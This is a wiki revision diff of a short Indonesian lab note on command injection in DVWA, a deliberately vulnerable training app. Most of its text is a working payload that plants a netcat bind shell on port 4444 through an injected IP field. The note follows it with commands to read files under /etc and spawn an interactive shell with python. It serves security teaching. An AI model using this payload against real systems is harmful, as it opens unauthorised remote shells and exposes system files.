DVWA: Command Injection Back Door: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
Newer edit →
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
Created page with " 192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe Untuk dapet shell ketik python -c 'import pty; pty.spawn("/bin/sh")'"
 
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
Line 1: Line 1:
Backdoor menggunakan perintah


fifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dari command injection di DVWA masukan


  192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
  192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe


dimana 192.168.43.1 adalah salah satu IP mesin di jaringan
Selanjutnya kita bisa memasukan perintah2 shell seperti
ls
cd /etc
cat <namafile>
dsb


Untuk dapet shell ketik
Percobaan untuk memperoleh shell  


  python -c 'import pty; pty.spawn("/bin/sh")'
  python -c 'import pty; pty.spawn("/bin/sh")'

Revision as of 22:10, 22 October 2018

Backdoor menggunakan perintah 

fifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Dari command injection di DVWA masukan 

192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

dimana 192.168.43.1 adalah salah satu IP mesin di jaringan

Selanjutnya kita bisa memasukan perintah2 shell seperti 

ls
cd /etc
cat <namafile>
dsb

Percobaan untuk memperoleh shell 

python -c 'import pty; pty.spawn("/bin/sh")'
Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=DVWA:_Command_Injection_Back_Door&oldid=52199"